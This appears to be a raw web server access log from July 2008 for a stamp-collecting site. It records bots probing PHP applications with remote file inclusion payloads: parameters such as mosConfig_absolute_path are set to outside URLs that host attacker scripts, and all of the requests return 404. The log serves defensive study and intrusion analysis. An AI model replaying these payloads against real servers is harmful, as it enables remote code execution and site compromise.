203.88.121.128 - - [06/Jul/2008:17:01:02 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
222.251.223.180 - - [06/Jul/2008:17:05:16 -0700] "GET /logs/access_080602.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
222.251.223.180 - - [06/Jul/2008:17:05:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:17:10:01 -0700] "GET //modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:17:10:09 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:17:11:08 -0700] "GET /logs/access_080526.log/index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:17:11:08 -0700] "GET /index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:17:11:08 -0700] "GET /logs/index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:17:11:08 -0700] "GET /logs/access_080609.log/index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:17:11:18 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:17:11:18 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:17:12:41 -0700] "GET /logs/access_080602.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:17:12:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:17:24:34 -0700] "GET /logs/access_080526.log//basicfogfactory.class.php?PATH_TO_CODE=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:17:24:35 -0700] "GET //basicfogfactory.class.php?PATH_TO_CODE=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:17:24:35 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:17:24:35 -0700] "GET /logs//basicfogfactory.class.php?PATH_TO_CODE=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:17:24:50 -0700] "GET //struct_admin.php?incl_page=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:17:24:50 -0700] "GET /logs//struct_admin.php?incl_page=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:17:24:50 -0700] "GET /logs//struct_admin.php?incl_page=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:17:24:50 -0700] "GET //struct_admin.php?incl_page=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
67.177.4.235 - - [06/Jul/2008:17:25:38 -0700] "GET /logs/access_080317.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.177.4.235 - - [06/Jul/2008:17:25:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:40 -0700] "GET /logs/access_080602.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:40 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:41 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:41 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:41 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
213.254.218.40 - - [06/Jul/2008:17:26:42 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
67.177.4.235 - - [06/Jul/2008:17:29:39 -0700] "GET /logs/access_080512.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.121.199.191 - - [06/Jul/2008:17:34:15 -0700] "GET /logs/access_080602.log/require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.121.199.191 - - [06/Jul/2008:17:34:15 -0700] "GET /require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.121.199.191 - - [06/Jul/2008:17:34:15 -0700] "GET /logs/require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:17:44:40 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:17:44:40 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
67.19.130.218 - - [06/Jul/2008:17:46:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
67.19.130.218 - - [06/Jul/2008:17:46:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
222.251.223.180 - - [06/Jul/2008:17:51:15 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.110.17 - - [06/Jul/2008:17:51:33 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.110.17 - - [06/Jul/2008:17:51:33 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.110.17 - - [06/Jul/2008:17:51:34 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.110.17 - - [06/Jul/2008:17:51:40 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:17:52:15 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:17:52:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:17:53:07 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
217.17.17.82 - - [06/Jul/2008:17:53:24 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
217.17.17.82 - - [06/Jul/2008:17:53:24 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
217.17.17.82 - - [06/Jul/2008:17:53:24 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
217.17.17.82 - - [06/Jul/2008:17:53:24 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:17:55:16 -0700] "GET /logs/access_080317.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:17:55:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.117.238.16 - - [06/Jul/2008:17:55:27 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:17:55:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.117.238.16 - - [06/Jul/2008:17:55:27 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.117.238.16 - - [06/Jul/2008:17:55:27 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.118.110.17 - - [06/Jul/2008:17:55:41 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.117.238.16 - - [06/Jul/2008:17:55:44 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:17:56:24 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:17:56:24 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:17:56:24 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:17:56:46 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:17:57:00 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.36.2.24 - - [06/Jul/2008:18:01:21 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.36.2.24 - - [06/Jul/2008:18:01:30 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.36.2.24 - - [06/Jul/2008:18:01:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.36.2.24 - - [06/Jul/2008:18:01:30 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:18:01:32 -0700] "GET /logs/access_080609.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:18:01:42 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:18:01:48 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
69.36.2.24 - - [06/Jul/2008:18:03:49 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:05:28 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:05:28 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:05:44 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:18:05:58 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
75.127.70.16 - - [06/Jul/2008:18:07:42 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [06/Jul/2008:18:07:42 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [06/Jul/2008:18:07:47 -0700] "GET /logs/access_080512.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [06/Jul/2008:18:09:20 -0700] "GET /logs/access_080414.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:09:54 -0700] "GET /logs/access_080602.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:09:54 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
116.40.122.120 - - [06/Jul/2008:18:11:13 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.98.78.150 - - [06/Jul/2008:18:11:44 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:50 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:51 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.246.22.32 - - [06/Jul/2008:18:11:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.58.78.39 - - [06/Jul/2008:18:12:09 -0700] "GET /admin_modules/?config[path_src_include]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.29.68.220 - - [06/Jul/2008:18:12:20 -0700] "GET /logs/access_080602.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [06/Jul/2008:18:12:21 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [06/Jul/2008:18:12:21 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [06/Jul/2008:18:12:56 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
78.24.133.93 - - [06/Jul/2008:18:13:26 -0700] "GET /logs/access_080602.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
78.24.133.93 - - [06/Jul/2008:18:13:27 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
78.24.133.93 - - [06/Jul/2008:18:13:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
78.24.133.93 - - [06/Jul/2008:18:14:16 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.58.78.39 - - [06/Jul/2008:18:14:49 -0700] "GET //admin_modules/?config[path_src_include]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.58.78.39 - - [06/Jul/2008:18:14:54 -0700] "GET /admin_modules/?config[path_src_include]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.58.78.39 - - [06/Jul/2008:18:15:46 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
116.40.122.120 - - [06/Jul/2008:18:17:22 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
116.40.122.120 - - [06/Jul/2008:18:17:23 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
116.40.122.120 - - [06/Jul/2008:18:17:24 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.246.218.239 - - [06/Jul/2008:18:21:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.246.218.239 - - [06/Jul/2008:18:21:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.246.218.239 - - [06/Jul/2008:18:21:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:18:21:49 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:18:21:49 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:21:49 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:21:49 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
